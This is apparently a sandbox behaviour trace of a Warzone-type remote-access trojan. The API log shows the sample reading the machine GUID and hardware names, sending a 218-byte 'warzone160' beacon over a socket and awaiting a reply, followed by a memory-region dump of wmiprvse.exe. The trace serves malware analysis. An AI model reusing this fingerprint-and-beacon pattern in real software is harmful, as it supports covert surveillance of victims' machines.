[0209.145] lstrcpyW (in: lpString1=0x3240000, lpString2="MachineGuid" | out: lpString1="MachineGuid") returned="MachineGuid"
[0209.146] RegQueryValueExW (in: hKey=0x334, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x18f420, lpData=0x0, lpcbData=0x18f424*=0x0 | out: lpType=0x18f420*=0x1, lpData=0x0, lpcbData=0x18f424*=0x4a) returned 0x0
[0209.146] GetProcessHeap () returned 0x7c0000
[0209.146] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x4a) returned 0x7f6980
[0209.146] RegQueryValueExW (in: hKey=0x334, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x18f420, lpData=0x7f6980, lpcbData=0x18f424*=0x4a | out: lpType=0x18f420*=0x1, lpData="03845cb8-7441-4a2f-8c0f-c90408af5778", lpcbData=0x18f424*=0x4a) returned 0x0
[0209.146] GetProcessHeap () returned 0x7c0000
[0209.146] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4a) returned 0x7f60e8
[0209.146] GetProcessHeap () returned 0x7c0000
[0209.146] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f6980 | out: hHeap=0x7c0000) returned 1
[0209.146] VirtualFree (lpAddress=0x3240000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.146] RegCloseKey (hKey=0x334) returned 0x0
[0209.146] GetProcessHeap () returned 0x7c0000
[0209.146] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x14) returned 0x7dd2f8
[0209.146] GetProcessHeap () returned 0x7c0000
[0209.146] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x14) returned 0x7dd278
[0209.146] GetProcessHeap () returned 0x7c0000
[0209.146] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7dd2f8 | out: hHeap=0x7c0000) returned 1
[0209.146] GetProcessHeap () returned 0x7c0000
[0209.146] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x14) returned 0x7dd458
[0209.146] GetProcessHeap () returned 0x7c0000
[0209.146] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f60e8 | out: hHeap=0x7c0000) returned 1
[0209.146] GetProcessHeap () returned 0x7c0000
[0209.146] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x14) returned 0x7dd1b8
[0209.146] lstrlenW (lpString="XC64ZB") returned 6
[0209.147] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3240000
[0209.147] lstrcpyW (in: lpString1=0x3240000, lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB"
[0209.147] lstrlenW (lpString="") returned 0
[0209.147] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x3250000
[0209.147] lstrcpyW (in: lpString1=0x3250000, lpString2="" | out: lpString1="") returned=""
[0209.147] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39
[0209.147] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x3260000
[0209.147] lstrcpyW (in: lpString1=0x3260000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz"
[0209.147] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24
[0209.147] VirtualAlloc (lpAddress=0x0, dwSize=0x32, flAllocationType=0x3000, flProtect=0x4) returned 0x3270000
[0209.148] lstrcpyW (in: lpString1=0x3270000, lpString2="Intel(R) HD Graphics 630" | out: lpString1="Intel(R) HD Graphics 630") returned="Intel(R) HD Graphics 630"
[0209.148] GetProcessHeap () returned 0x7c0000
[0209.148] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7dd278 | out: hHeap=0x7c0000) returned 1
[0209.148] VirtualFree (lpAddress=0x3230000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.148] VirtualFree (lpAddress=0x3220000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.148] VirtualFree (lpAddress=0x2a30000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.148] VirtualFree (lpAddress=0x2a20000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x14) returned 0x7dd498
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7dd498, Size=0x18) returned 0x7dd3f8
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7dd3f8, Size=0x1c) returned 0x7e0970
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7e0970, Size=0x20) returned 0x7e0808
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7e0808, Size=0x24) returned 0x7f32f8
[0209.149] lstrlenW (lpString="XC64ZB") returned 6
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7f32f8, Size=0x28) returned 0x7f3328
[0209.149] lstrlenW (lpString="XC64ZB") returned 6
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7f3328, Size=0x36) returned 0x7e1268
[0209.149] lstrlenW (lpString="") returned 0
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7e1268, Size=0x3a) returned 0x7df768
[0209.149] lstrlenW (lpString="") returned 0
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7df768, Size=0x3c) returned 0x7df0f0
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7df0f0, Size=0x40) returned 0x7df840
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7df840, Size=0x44) returned 0x7e91d8
[0209.149] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7e91d8, Size=0x48) returned 0x7e93b8
[0209.149] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7e93b8, Size=0x98) returned 0x7f77f8
[0209.149] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24
[0209.149] GetProcessHeap () returned 0x7c0000
[0209.149] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7f77f8, Size=0x9c) returned 0x7f77f8
[0209.149] lstrlenW (lpString="Intel(R) HD Graphics 630") returned 24
[0209.150] GetProcessHeap () returned 0x7c0000
[0209.150] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7f77f8, Size=0xce) returned 0x7f77f8
[0209.150] GetProcessHeap () returned 0x7c0000
[0209.150] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x4) returned 0x7f3b40
[0209.150] GetProcessHeap () returned 0x7c0000
[0209.150] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7f3b40, Size=0x8) returned 0x7f3aa0
[0209.150] GetProcessHeap () returned 0x7c0000
[0209.150] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7f3aa0, Size=0xc) returned 0x7e3a70
[0209.150] GetProcessHeap () returned 0x7c0000
[0209.150] RtlReAllocateHeap (Heap=0x7c0000, Flags=0x0, Ptr=0x7e3a70, Size=0xda) returned 0x7f7508
[0209.150] GetProcessHeap () returned 0x7c0000
[0209.150] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xda) returned 0x7f7ba0
[0209.150] GetProcessHeap () returned 0x7c0000
[0209.150] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f77f8 | out: hHeap=0x7c0000) returned 1
[0209.150] GetProcessHeap () returned 0x7c0000
[0209.150] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f7508 | out: hHeap=0x7c0000) returned 1
[0209.150] lstrlenA (lpString="warzone160") returned 10
[0209.150] lstrlenA (lpString="warzone160") returned 10
[0209.150] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2a20000
[0209.150] lstrcpyA (in: lpString1=0x2a20000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160"
[0209.150] lstrlenA (lpString="warzone160") returned 10
[0209.150] GetProcessHeap () returned 0x7c0000
[0209.150] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xb) returned 0x7e3b78
[0209.150] VirtualFree (lpAddress=0x2a20000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.151] GetProcessHeap () returned 0x7c0000
[0209.151] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xda) returned 0x7f77f8
[0209.151] GetProcessHeap () returned 0x7c0000
[0209.151] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xb) returned 0x7e3b90
[0209.151] GetProcessHeap () returned 0x7c0000
[0209.151] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xda) returned 0x7f7508
[0209.151] GetProcessHeap () returned 0x7c0000
[0209.151] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xda) returned 0x7f7c88
[0209.151] GetProcessHeap () returned 0x7c0000
[0209.151] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f7508 | out: hHeap=0x7c0000) returned 1
[0209.151] GetProcessHeap () returned 0x7c0000
[0209.151] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e3b90 | out: hHeap=0x7c0000) returned 1
[0209.151] GetProcessHeap () returned 0x7c0000
[0209.151] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f77f8 | out: hHeap=0x7c0000) returned 1
[0209.151] send (s=0x290, buf=0x7f7c88*, len=218, flags=0) returned 218
[0209.152] GetProcessHeap () returned 0x7c0000
[0209.152] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f7c88 | out: hHeap=0x7c0000) returned 1
[0209.152] GetProcessHeap () returned 0x7c0000
[0209.152] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e3b78 | out: hHeap=0x7c0000) returned 1
[0209.152] GetProcessHeap () returned 0x7c0000
[0209.152] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f7ba0 | out: hHeap=0x7c0000) returned 1
[0209.152] VirtualFree (lpAddress=0x3270000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.152] VirtualFree (lpAddress=0x3260000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.153] VirtualFree (lpAddress=0x3250000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.153] VirtualFree (lpAddress=0x3240000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.153] GetProcessHeap () returned 0x7c0000
[0209.153] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7dd1b8 | out: hHeap=0x7c0000) returned 1
[0209.153] VirtualFree (lpAddress=0x2a10000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.153] VirtualFree (lpAddress=0x2a40000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0209.154] GetProcessHeap () returned 0x7c0000
[0209.154] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7cbc08 | out: hHeap=0x7c0000) returned 1
[0209.154] recv (s=0x290, buf=0x18f860, len=12, flags=0)
Thread:
id = 97
os_tid = 0x1274
Thread:
id = 115
os_tid = 0x126c
Thread:
id = 116
os_tid = 0x1264
Thread:
id = 117
os_tid = 0x1074
Process:
id = "8"
image_name = "wmiprvse.exe"
filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
page_root = "0x7acf7000"
os_pid = "0x10a0"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "6"
os_parent_pid = "0x274"
cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Network Service"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000534ae" [0xc000000f]
Region:
id = 1448
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1449
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 1450
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1451
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1452
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1453
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1454
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1455
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1456
start_va = 0x1c0000
end_va = 0x1c6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1457
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1458
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 1459
start_va = 0x1f0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 1460
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1461
start_va = 0x480000
end_va = 0x480fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 1462
start_va = 0x490000
end_va = 0x50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 1463
start_va = 0x510000
end_va = 0x51ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000510000"
filename = ""
Region:
id = 1464
start_va = 0x520000
end_va = 0x520fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000520000"
filename = ""
Region:
id = 1465
start_va = 0x530000
end_va = 0x530fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000530000"
filename = ""
Region:
id = 1466
start_va = 0x540000
end_va = 0x5bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 1467
start_va = 0x5c0000
end_va = 0x6bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 1468
start_va = 0x6c0000
end_va = 0x9f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1469
start_va = 0xa00000
end_va = 0xb87fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a00000"
filename = ""
Region:
id = 1470
start_va = 0xb90000
end_va = 0xd10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b90000"
filename = ""
Region:
id = 1471
start_va = 0xd20000
end_va = 0xddffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000d20000"
filename = ""
Region:
id = 1472
start_va = 0xde0000
end_va = 0xedffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000de0000"
filename = ""
Region:
id = 1473
start_va = 0xee0000
end_va = 0xf5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ee0000"
filename = ""
Region:
id = 1474
start_va = 0xf60000
end_va = 0xfdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f60000"
filename = ""
Region:
id = 1475
start_va = 0xfe0000
end_va = 0x105ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fe0000"
filename = ""
Region:
id = 1476
start_va = 0x1060000
end_va = 0x10dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001060000"
filename = ""
Region:
id = 1477
start_va = 0x10e0000
end_va = 0x115ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010e0000"
filename = ""
Region:
id = 1478
start_va = 0x1160000
end_va = 0x11dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001160000"
filename = ""
Region:
id = 1479
start_va = 0x11f0000
end_va = 0x11f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "security.dll"
filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll")
Region:
id = 1480
start_va = 0x1210000
end_va = 0x130ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001210000"
filename = ""
Region:
id = 1481
start_va = 0x1320000
end_va = 0x1322fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cimwin32.dll.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui")
Region:
id = 1482
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1483
start_va = 0x180000000
end_va = 0x180002fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wmi.dll"
filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll")
Region:
id = 1484
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 1485
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 1486
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 1487
start_va = 0x7ff7aedf0000
end_va = 0x7ff7aee6ffff
monitored = 0
entry_point = 0x7ff7aee05f50
region_type = mapped_file
name = "wmiprvse.exe"
filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")
Region:
id = 1488
start_va = 0x7ff9fbb90000
end_va = 0x7ff9fbba3fff
monitored = 0
entry_point = 0x7ff9fbb91310
region_type = mapped_file
name = "browcli.dll"
filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll")
Region:
id = 1489
start_va = 0x7ff9fbbb0000
end_va = 0x7ff9fbd7efff
monitored = 1
entry_point = 0x7ff9fbbd7df0
region_type = mapped_file
name = "cimwin32.dll"
filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll")
Region:
id = 1490
start_va = 0x7ffa05c40000
end_va = 0x7ffa05c4dfff
monitored = 0
entry_point = 0x7ffa05c41da0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 1491
start_va = 0x7ffa06830000
end_va = 0x7ffa06855fff
monitored = 0
entry_point = 0x7ffa06831cf0
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 1492
start_va = 0x7ffa07ad0000
end_va = 0x7ffa07ae5fff
monitored = 0
entry_point = 0x7ffa07ad55e0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 1493
start_va = 0x7ffa07c90000
end_va = 0x7ffa07cb4fff
monitored = 0
entry_point = 0x7ffa07c99900
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 1494
start_va = 0x7ffa07cc0000
end_va = 0x7ffa07cd3fff
monitored = 0
entry_point = 0x7ffa07cc1800
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1495
start_va = 0x7ffa07ce0000
end_va = 0x7ffa07dd5fff
monitored = 0
entry_point = 0x7ffa07d19590
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1496
start_va = 0x7ffa08390000
end_va = 0x7ffa083a0fff
monitored = 0
entry_point = 0x7ffa08392fc0
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 1497
start_va = 0x7ffa08a00000
end_va = 0x7ffa08a0bfff
monitored = 0
entry_point = 0x7ffa08a035c0
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1498
start_va = 0x7ffa08aa0000
end_va = 0x7ffa08aaafff
monitored = 0
entry_point = 0x7ffa08aa12b0
region_type = mapped_file
name = "schedcli.dll"
filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll")
Region:
id = 1499
start_va = 0x7ffa09490000
end_va = 0x7ffa0950efff
monitored = 1
entry_point = 0x7ffa094a7110
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 1500
start_va = 0x7ffa0afc0000
end_va = 0x7ffa0afd1fff
monitored = 0
entry_point = 0x7ffa0afc3580
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 1501
start_va = 0x7ffa0b750000
end_va = 0x7ffa0b79dfff
monitored = 0
entry_point = 0x7ffa0b761ce0
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 1502
start_va = 0x7ffa0c300000
end_va = 0x7ffa0c318fff
monitored = 0
entry_point = 0x7ffa0c304520
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 1503
start_va = 0x7ffa0e880000
end_va = 0x7ffa0e895fff
monitored = 0
entry_point = 0x7ffa0e881b60
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 1504
start_va = 0x7ffa0f030000
end_va = 0x7ffa0f06dfff
monitored = 0
entry_point = 0x7ffa0f03a050
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 1505
start_va = 0x7ffa0f3e0000
end_va = 0x7ffa0f3f0fff
monitored = 0
entry_point = 0x7ffa0f3e3320
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 1506
start_va = 0x7ffa0ff20000
end_va = 0x7ffa0ff29fff
monitored = 0
entry_point = 0x7ffa0ff21660
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1507
start_va = 0x7ffa11410000
end_va = 0x7ffa11422fff
monitored = 0
entry_point = 0x7ffa11412760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1508
start_va = 0x7ffa117d0000
end_va = 0x7ffa117f6fff
monitored = 0
entry_point = 0x7ffa117d7940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1509
start_va = 0x7ffa121a0000
end_va = 0x7ffa121abfff
monitored = 0
entry_point = 0x7ffa121a27e0
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1510
start_va = 0x7ffa122e0000
end_va = 0x7ffa12359fff
monitored = 0
entry_point = 0x7ffa12301a50
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 1511
start_va = 0x7ffa12a10000
end_va = 0x7ffa12a3cfff
monitored = 0
entry_point = 0x7ffa12a29d40
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1512
start_va = 0x7ffa12ba0000
end_va = 0x7ffa12bf5fff
monitored = 0
entry_point = 0x7ffa12bb0bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1513
start_va = 0x7ffa12c20000
end_va = 0x7ffa12c48fff
monitored = 0
entry_point = 0x7ffa12c34530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1514
start_va = 0x7ffa12db0000
end_va = 0x7ffa12dbffff
monitored = 0
entry_point = 0x7ffa12db56e0
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1515
start_va = 0x7ffa12dc0000
end_va = 0x7ffa12e0afff
monitored = 0
entry_point = 0x7ffa12dc35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1516
start_va = 0x7ffa12e10000
end_va = 0x7ffa12e1efff
monitored = 0
entry_point = 0x7ffa12e13210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1517
start_va = 0x7ffa12f40000
end_va = 0x7ffa13106fff
monitored = 0
entry_point = 0x7ffa12f9db80
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1518
start_va = 0x7ffa13110000
end_va = 0x7ffa13126fff
monitored = 0
entry_point = 0x7ffa13111390
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 1519
start_va = 0x7ffa13130000
end_va = 0x7ffa13317fff
monitored = 0
entry_point = 0x7ffa1315ba70
